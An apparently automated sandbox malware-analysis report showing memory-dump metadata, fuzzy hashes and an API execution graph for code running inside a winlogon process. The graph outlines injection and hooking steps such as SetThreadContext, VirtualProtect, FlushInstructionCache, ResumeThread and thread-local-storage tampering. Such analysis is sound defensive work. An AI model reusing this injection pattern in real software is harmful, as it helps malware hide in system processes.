                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 6f79bdca26009a9ee4067a207548d913ca885e6906045b0f798edfce7c91817a
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: B311A132F41B8885FA16CB67A40459A77A0FBC8FC5F984028DE4E57724DF3AC4438382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 94fdc9e09a08f213f1bc6ccc5a98238e785e2224b4f0dd50957134c3d91f74e5
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: A011A132F01B8881FA16CB66A40959977A0FBC9FD4F998128DE4E53724DF3AD4438386
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: e1af4d63e573468e5d58cd1c053f447371db77335f721c67b8fdd4aa0972600e
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 3D11A132E05B8881FB16CB66E40899977B0FB88FC5F994024DE4E53764DF39D5828341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 32f83ff9894d743aa2ecb00ca60260912a8aebc8456aa75ed97ca70b7629fe4d
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: A1E03032A416089AF7158B52D80879A36E1FBC8B09F848014CD090B350DF7EC49A87C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 0CE03932A416089AF7158B62D80979936E1FB88B19FC6C024C90907350EF7ED49A87C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: C8E06572A427089AF715CF52D81878936E1FF88F0AF85C014C90907350DF7ED5998782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: b65b3539fbd709d3eb2ea5f55c358f6cc5828dd715b3526b499a0208b2522084
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: F4E0ED72A51608AAF7199B62D8046AA76A1FFC8B19F848024CD090B310EE3D849A9792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 4bb58136d852c2a653d8a036cd639210b1baa135ea19a913abf8e9fecaf76bee
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: BCE06D72A516089AF7198B22D80969832A1FF88B19FC5C020C90907310EE3D949A9692
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 44117e496ed412bfeff2ee36783a986e767d656568b4863f217f146fa26acdf1
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 69E092B2A526089BF719CF22DC1478836E1FF8CF0AF858020C90907350EE3DD598D752

                                                  Execution Graph

                                                  Execution Coverage:1.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1404
                                                  Total number of Limit Nodes:3
                                                  execution_graph 8330 17d2dd5bd34 8331 17d2dd5bd4d 8330->8331 8344 17d2dd5bd49 8330->8344 8332 17d2dd5e864 56 API calls 8331->8332 8333 17d2dd5bd52 8332->8333 8345 17d2dd5edc8 GetEnvironmentStringsW 8333->8345 8336 17d2dd5bd5f 8338 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8336->8338 8337 17d2dd5bd6b 8365 17d2dd5bda8 8337->8365 8338->8344 8341 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8342 17d2dd5bd92 8341->8342 8343 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8342->8343 8343->8344 8346 17d2dd5bd57 8345->8346 8347 17d2dd5edf8 8345->8347 8346->8336 8346->8337 8348 17d2dd5ece8 WideCharToMultiByte 8347->8348 8349 17d2dd5ee49 8348->8349 8350 17d2dd5ee53 FreeEnvironmentStringsW 8349->8350 8351 17d2dd5c5d0 14 API calls 8349->8351 8350->8346 8352 17d2dd5ee63 8351->8352 8353 17d2dd5ee74 8352->8353 8354 17d2dd5ee6b 8352->8354 8356 17d2dd5ece8 WideCharToMultiByte 8353->8356 8355 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8354->8355 8357 17d2dd5ee72 8355->8357 8358 17d2dd5ee97 8356->8358 8357->8350 8359 17d2dd5ee9b 8358->8359 8360 17d2dd5eea5 8358->8360 8361 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8359->8361 8362 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8360->8362 8363 17d2dd5eea3 FreeEnvironmentStringsW 8361->8363 8362->8363 8363->8346 8366 17d2dd5bdcd 8365->8366 8367 17d2dd5d220 __std_exception_copy 13 API calls 8366->8367 8380 17d2dd5be03 8367->8380 8368 17d2dd5be0b 8369 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8368->8369 8371 17d2dd5bd73 8369->8371 8370 17d2dd5be6d 8372 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8370->8372 8371->8341 8372->8371 8373 17d2dd5d220 __std_exception_copy 13 API calls 8373->8380 8374 17d2dd5be92 8375 17d2dd5bebc 13 API calls 8374->8375 8377 17d2dd5be9a 8375->8377 8378 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8377->8378 8378->8368 8379 17d2dd5bea6 8381 17d2dd5d06c _invalid_parameter_noinfo 17 API calls 8379->8381 8380->8368 8380->8370 8380->8373 8380->8374 8380->8379 8382 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8380->8382 8384 17d2dd5c328 8380->8384 8383 17d2dd5beb9 8381->8383 8382->8380 8385 17d2dd5c33f 8384->8385 8386 17d2dd5c335 8384->8386 8387 17d2dd5d1f4 __std_exception_copy 13 API calls 8385->8387 8386->8385 8391 17d2dd5c35a 8386->8391 8388 17d2dd5c346 8387->8388 8389 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8388->8389 8390 17d2dd5c352 8389->8390 8390->8380 8391->8390 8392 17d2dd5d1f4 __std_exception_copy 13 API calls 8391->8392 8392->8388 8532 17d2dd52ab4 TlsGetValue TlsGetValue TlsGetValue 8533 17d2dd52b0d 8532->8533 8535 17d2dd52b79 8532->8535 8533->8535 8536 17d2dd52b15 8533->8536 8534 17d2dd52b74 8535->8534 8537 17d2dd52c32 TlsSetValue TlsSetValue TlsSetValue 8535->8537 8539 17d2dd53f88 StrCmpNIW 8535->8539 8536->8534 8536->8537 8538 17d2dd53f88 StrCmpNIW 8536->8538 8537->8534 8538->8536 8539->8535 8849 17d2dd5ec30 GetCommandLineA GetCommandLineW 8850 17d2dd56430 8851 17d2dd5643d 8850->8851 8852 17d2dd56449 8851->8852 8857 17d2dd5655a 8851->8857 8853 17d2dd564cd 8852->8853 8854 17d2dd564a6 SetThreadContext 8852->8854 8854->8853 8855 17d2dd56581 VirtualProtect FlushInstructionCache 8855->8857 8856 17d2dd5663e 8858 17d2dd5665e 8856->8858 8866 17d2dd54b20 8856->8866 8857->8855 8857->8856 8870 17d2dd55530 GetCurrentProcess 8858->8870 8861 17d2dd566b7 8864 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8861->8864 8862 17d2dd56677 ResumeThread 8863 17d2dd56663 8862->8863 8863->8861 8863->8862 8865 17d2dd566ff 8864->8865 8868 17d2dd54b3c 8866->8868 8867 17d2dd54b9f 8867->8858 8868->8867 8869 17d2dd54b52 VirtualFree 8868->8869 8869->8868 8871 17d2dd5554c 8870->8871 8872 17d2dd55562 VirtualProtect FlushInstructionCache 8871->8872 8873 17d2dd55593 8871->8873 8872->8871 8873->8863 7601 17d2dd51e3c LoadLibraryA GetProcAddress 7602 17d2dd51e62 SleepEx 7601->7602 7603 17d2dd51e6f 7601->7603 7602->7602 8540 17d2dd534b8 8541 17d2dd534e8 8540->8541 8542 17d2dd535a1 8541->8542 8543 17d2dd53505 PdhGetCounterInfoW 8541->8543 8543->8542 8544 17d2dd53523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8543->8544 8545 17d2dd5358d GetProcessHeap HeapFree 8544->8545 8546 17d2dd53555 StrCmpW 8544->8546 8545->8542 8546->8545 8548 17d2dd5356a 8546->8548 8547 17d2dd53950 12 API calls 8547->8548 8548->8545 8548->8547 8874 17d2dd5fe20 8875 17d2dd5fe4a 8874->8875 8876 17d2dd5d220 __std_exception_copy 13 API calls 8875->8876 8877 17d2dd5fe6a 8876->8877 8878 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8877->8878 8879 17d2dd5fe78 8878->8879 8880 17d2dd5fea2 8879->8880 8881 17d2dd5d220 __std_exception_copy 13 API calls 8879->8881 8882 17d2dd5fec1 InitializeCriticalSectionEx 8880->8882 8884 17d2dd5feab 8880->8884 8883 17d2dd5fe94 8881->8883 8882->8880 8885 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8883->8885 8885->8880 8886 17d2dd5f820 8889 17d2dd5f7d8 8886->8889 8894 17d2dd5c558 EnterCriticalSection 8889->8894 7604 17d2dd6479d 7607 17d2dd5af34 7604->7607 7608 17d2dd5af4e 7607->7608 7610 17d2dd5af9b 7607->7610 7608->7610 7611 17d2dd59324 7608->7611 7614 17d2dd59340 7611->7614 7613 17d2dd5932d 7613->7610 7615 17d2dd5935f GetLastError 7614->7615 7616 17d2dd59358 7614->7616 7626 17d2dd59c8c 7615->7626 7616->7613 7630 17d2dd59aac 7626->7630 7636 17d2dd59b96 TlsGetValue 7630->7636 7637 17d2dd59af0 __vcrt_InitializeCriticalSectionEx 7630->7637 7631 17d2dd59b1e LoadLibraryExW 7633 17d2dd59bbd 7631->7633 7634 17d2dd59b3f GetLastError 7631->7634 7632 17d2dd59bdd GetProcAddress 7632->7636 7633->7632 7635 17d2dd59bd4 FreeLibrary 7633->7635 7634->7637 7635->7632 7637->7631 7637->7632 7637->7636 7638 17d2dd59b61 LoadLibraryExW 7637->7638 7638->7633 7638->7637 8393 17d2dd54320 8394 17d2dd5426d 8393->8394 8395 17d2dd542bd VirtualQuery 8394->8395 8396 17d2dd542d7 8394->8396 8397 17d2dd54322 GetLastError 8394->8397 8395->8394 8395->8396 8397->8394 8398 17d2dd5872c 8401 17d2dd590c0 8398->8401 8400 17d2dd58755 8402 17d2dd59116 8401->8402 8403 17d2dd590e1 8401->8403 8402->8400 8403->8402 8404 17d2dd5c328 __std_exception_copy 38 API calls 8403->8404 8404->8402 8572 17d2dd5aaac 8573 17d2dd5aad9 __except_validate_context_record 8572->8573 8574 17d2dd59324 _CreateFrameInfo 9 API calls 8573->8574 8575 17d2dd5aade 8574->8575 8578 17d2dd5ab38 8575->8578 8579 17d2dd5abc6 8575->8579 8586 17d2dd5ab8c 8575->8586 8576 17d2dd5ac34 8576->8586 8614 17d2dd5a22c 8576->8614 8577 17d2dd5abb3 8601 17d2dd595d0 8577->8601 8578->8577 8578->8586 8587 17d2dd5ab5a __GetCurrentState 8578->8587 8583 17d2dd5abe5 8579->8583 8608 17d2dd599cc 8579->8608 8583->8576 8583->8586 8611 17d2dd599e0 8583->8611 8585 17d2dd5acdd 8587->8585 8589 17d2dd5afb8 8587->8589 8590 17d2dd599cc Is_bad_exception_allowed 9 API calls 8589->8590 8591 17d2dd5afe7 __GetCurrentState 8590->8591 8592 17d2dd59324 _CreateFrameInfo 9 API calls 8591->8592 8597 17d2dd5b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8592->8597 8593 17d2dd5b0fb 8594 17d2dd59324 _CreateFrameInfo 9 API calls 8593->8594 8595 17d2dd5b100 8594->8595 8596 17d2dd59324 _CreateFrameInfo 9 API calls 8595->8596 8598 17d2dd5b10b __FrameHandler3::GetHandlerSearchState 8595->8598 8596->8598 8597->8593 8597->8598 8599 17d2dd599cc 9 API calls Is_bad_exception_allowed 8597->8599 8671 17d2dd599f4 8597->8671 8598->8586 8599->8597 8674 17d2dd59634 8601->8674 8603 17d2dd595ef __FrameHandler3::FrameUnwindToEmptyState 8678 17d2dd59540 8603->8678 8606 17d2dd5afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8607 17d2dd59624 8606->8607 8607->8586 8609 17d2dd59324 _CreateFrameInfo 9 API calls 8608->8609 8610 17d2dd599d5 8609->8610 8610->8583 8612 17d2dd59324 _CreateFrameInfo 9 API calls 8611->8612 8613 17d2dd599e9 8612->8613 8613->8576 8682 17d2dd5b144 8614->8682 8616 17d2dd5a6f4 8617 17d2dd5a645 8617->8616 8657 17d2dd5a643 8617->8657 8735 17d2dd5a6fc 8617->8735 8618 17d2dd5a373 8618->8617 8630 17d2dd5a3ab 8618->8630 8620 17d2dd59324 _CreateFrameInfo 9 API calls 8621 17d2dd5a687 8620->8621 8621->8616 8626 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8621->8626 8622 17d2dd5a575 8627 17d2dd5a592 8622->8627 8629 17d2dd599cc Is_bad_exception_allowed 9 API calls 8622->8629 8622->8657 8623 17d2dd59324 _CreateFrameInfo 9 API calls 8625 17d2dd5a2da 8623->8625 8625->8621 8631 17d2dd59324 _CreateFrameInfo 9 API calls 8625->8631 8628 17d2dd5a69a 8626->8628 8634 17d2dd5a5b4 8627->8634 8627->8657 8728 17d2dd595a4 8627->8728 8628->8586 8629->8627 8630->8622 8646 17d2dd599e0 9 API calls 8630->8646 8707 17d2dd5a96c 8630->8707 8721 17d2dd5a158 8630->8721 8633 17d2dd5a2ea 8631->8633 8635 17d2dd59324 _CreateFrameInfo 9 API calls 8633->8635 8636 17d2dd5a5ca 8634->8636 8634->8657 8668 17d2dd5a6d7 8634->8668 8637 17d2dd5a2f3 8635->8637 8641 17d2dd599cc Is_bad_exception_allowed 9 API calls 8636->8641 8642 17d2dd5a5d5 8636->8642 8693 17d2dd59a0c 8637->8693 8638 17d2dd59324 _CreateFrameInfo 9 API calls 8640 17d2dd5a6dd 8638->8640 8643 17d2dd59324 _CreateFrameInfo 9 API calls 8640->8643 8641->8642 8645 17d2dd5b1dc 9 API calls 8642->8645 8647 17d2dd5a6e6 8643->8647 8648 17d2dd5a5eb 8645->8648 8646->8630 8650 17d2dd5c2f4 14 API calls 8647->8650 8652 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8648->8652 8648->8657 8649 17d2dd59324 _CreateFrameInfo 9 API calls 8651 17d2dd5a335 8649->8651 8650->8616 8651->8618 8654 17d2dd59324 _CreateFrameInfo 9 API calls 8651->8654 8653 17d2dd5a605 8652->8653 8732 17d2dd59838 RtlUnwindEx 8653->8732 8656 17d2dd5a341 8654->8656 8658 17d2dd59324 _CreateFrameInfo 9 API calls 8656->8658 8657->8620 8660 17d2dd5a34a 8658->8660 8696 17d2dd5b1dc 8660->8696 8664 17d2dd5a35e 8703 17d2dd5b2cc 8664->8703 8666 17d2dd5a6d1 8667 17d2dd5c2f4 14 API calls 8666->8667 8667->8668 8668->8638 8669 17d2dd5a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8669->8666 8670 17d2dd59178 Concurrency::cancel_current_task 2 API calls 8669->8670 8670->8666 8672 17d2dd59324 _CreateFrameInfo 9 API calls 8671->8672 8673 17d2dd59a02 8672->8673 8673->8597 8677 17d2dd59662 __FrameHandler3::FrameUnwindToEmptyState 8674->8677 8675 17d2dd596d4 8675->8603 8676 17d2dd5968c RtlLookupFunctionEntry 8676->8677 8677->8675 8677->8676 8679 17d2dd59560 8678->8679 8680 17d2dd5958b 8678->8680 8679->8680 8681 17d2dd59324 _CreateFrameInfo 9 API calls 8679->8681 8680->8606 8681->8679 8683 17d2dd5b169 __FrameHandler3::FrameUnwindToEmptyState 8682->8683 8684 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8683->8684 8685 17d2dd5b17e 8684->8685 8747 17d2dd59db4 8685->8747 8688 17d2dd5b1b3 8690 17d2dd59db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8688->8690 8689 17d2dd5b190 __FrameHandler3::GetHandlerSearchState 8750 17d2dd59dec 8689->8750 8691 17d2dd5a28e 8690->8691 8691->8616 8691->8618 8691->8623 8694 17d2dd59324 _CreateFrameInfo 9 API calls 8693->8694 8695 17d2dd59a1a 8694->8695 8695->8616 8695->8649 8698 17d2dd5b2c3 8696->8698 8702 17d2dd5b207 8696->8702 8697 17d2dd5a35a 8697->8618 8697->8664 8699 17d2dd599e0 9 API calls 8699->8702 8700 17d2dd599cc Is_bad_exception_allowed 9 API calls 8700->8702 8701 17d2dd5a96c 9 API calls 8701->8702 8702->8697 8702->8699 8702->8700 8702->8701 8705 17d2dd5b2e9 Is_bad_exception_allowed 8703->8705 8706 17d2dd5b339 8703->8706 8704 17d2dd599cc 9 API calls Is_bad_exception_allowed 8704->8705 8705->8704 8705->8706 8706->8669 8708 17d2dd5aa28 8707->8708 8709 17d2dd5a999 8707->8709 8708->8630 8710 17d2dd599cc Is_bad_exception_allowed 9 API calls 8709->8710 8711 17d2dd5a9a2 8710->8711 8711->8708 8712 17d2dd599cc Is_bad_exception_allowed 9 API calls 8711->8712 8713 17d2dd5a9bb 8711->8713 8712->8713 8713->8708 8714 17d2dd5a9e7 8713->8714 8715 17d2dd599cc Is_bad_exception_allowed 9 API calls 8713->8715 8716 17d2dd599e0 9 API calls 8714->8716 8715->8714 8717 17d2dd5a9fb 8716->8717 8717->8708 8718 17d2dd5aa14 8717->8718 8719 17d2dd599cc Is_bad_exception_allowed 9 API calls 8717->8719 8720 17d2dd599e0 9 API calls 8718->8720 8719->8718 8720->8708 8722 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8721->8722 8723 17d2dd5a195 8722->8723 8724 17d2dd599cc Is_bad_exception_allowed 9 API calls 8723->8724 8725 17d2dd5a1cd 8724->8725 8726 17d2dd59838 9 API calls 8725->8726 8727 17d2dd5a211 8726->8727 8727->8630 8729 17d2dd595b8 __FrameHandler3::FrameUnwindToEmptyState 8728->8729 8730 17d2dd59540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8729->8730 8731 17d2dd595c2 8730->8731 8731->8634 8733 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8732->8733 8734 17d2dd59932 8733->8734 8734->8657 8736 17d2dd5a735 8735->8736 8740 17d2dd5a948 8735->8740 8737 17d2dd59324 _CreateFrameInfo 9 API calls 8736->8737 8738 17d2dd5a73a 8737->8738 8739 17d2dd5a759 EncodePointer 8738->8739 8745 17d2dd5a7ac 8738->8745 8741 17d2dd59324 _CreateFrameInfo 9 API calls 8739->8741 8740->8657 8742 17d2dd5a769 8741->8742 8742->8745 8753 17d2dd594ec 8742->8753 8744 17d2dd5a158 19 API calls 8744->8745 8745->8740 8745->8744 8746 17d2dd599cc 9 API calls Is_bad_exception_allowed 8745->8746 8746->8745 8748 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8747->8748 8749 17d2dd59dc7 8748->8749 8749->8688 8749->8689 8751 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8750->8751 8752 17d2dd59e06 8751->8752 8752->8691 8754 17d2dd59324 _CreateFrameInfo 9 API calls 8753->8754 8755 17d2dd59518 8754->8755 8755->8745 7639 17d2dd60fa8 7640 17d2dd60fcc 7639->7640 7643 17d2dd58070 7640->7643 7644 17d2dd58079 7643->7644 7645 17d2dd58084 7644->7645 7646 17d2dd58848 IsProcessorFeaturePresent 7644->7646 7647 17d2dd58860 7646->7647 7652 17d2dd5891c RtlCaptureContext 7647->7652 7653 17d2dd58936 RtlLookupFunctionEntry 7652->7653 7654 17d2dd5894c 